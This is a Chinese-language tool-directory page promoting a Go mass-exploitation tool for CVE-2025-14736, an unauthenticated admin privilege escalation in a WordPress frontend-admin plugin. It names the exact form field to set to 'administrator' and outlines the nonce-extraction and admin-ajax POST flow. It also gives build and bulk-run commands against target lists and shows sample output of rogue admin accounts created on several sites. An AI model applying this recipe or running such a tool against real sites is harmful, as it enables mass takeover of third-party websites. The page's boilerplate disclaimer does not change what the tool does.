Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-14736 — 通过角色表单字段实现未认证的权限提升至管理员 | Kitploit
工具/GitHubGitHub/hyunchiya/cve-2025-14736
权限提升密码攻击漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubhyunchiya/cve-2025-14736

CVE-2025-14736

通过角色表单字段实现未认证的权限提升至管理员

查看仓库
7个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-14736

Frontend Admin by DynamiApps - 未认证权限提升

作者: Hyun Chiya


漏洞信息

字段值
CVE IDCVE-2025-14736
插件Frontend Admin by DynamiApps
受影响版本<= 3.28.25
漏洞类型未认证权限提升
严重性严重

描述

WordPress 的 Frontend Admin 插件在注册过程中对用户可控字段的验证不足,导致存在未认证权限提升漏洞。攻击者可通过操纵表单提交数据包来注入任意角色,包括 administrator。

根因分析

漏洞逻辑位于对表单提交的处理中,其中 role 字段直接信任来自用户的输入,而未验证该用户是否有权分配此角色。具体而言,字段 acff[user][field_user_role_ID] 可被修改为 administrator。

利用流程

root@kitploit:~
flowchart TD
    A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
    B --> C["Construct POST payload with 'role'='administrator'"]
    C --> D["POST to /wp-admin/admin-ajax.php"]
    D --> E{"Verification"}
    E -->|Success| F["New Admin User Created"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff

前置条件

  1. 目标安装了 "Frontend Admin" 插件(受影响版本)。
  2. 启用了可访问的前端注册表单。

构建

root@kitploit:~
go build -o mass_exploit.exe mass_exploit.go

使用方法

批量扫描与利用

root@kitploit:~
.\mass_exploit.exe -l list.txt -t 50

选项

参数描述
-l目标 URL 列表路径(默认:list.txt)
-t并发线程数(默认:10)
-timeout请求超时时间(秒)(默认:15)

示例输出

root@kitploit:~
>> [ ONLINE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14736 - Mass Exploit Tool                                                  ║
    ║   Frontend Admin by DynamiApps Privilege Escalation                                   ║
    ║   Author: Hyun Chiya                                                                  ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...

[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32

[*] Scan complete.

免责声明

本工具仅供教育和授权安全测试使用。未经授权访问计算机系统属于违法行为。请负责任地使用。

作者

Hyun Chiya

下载工具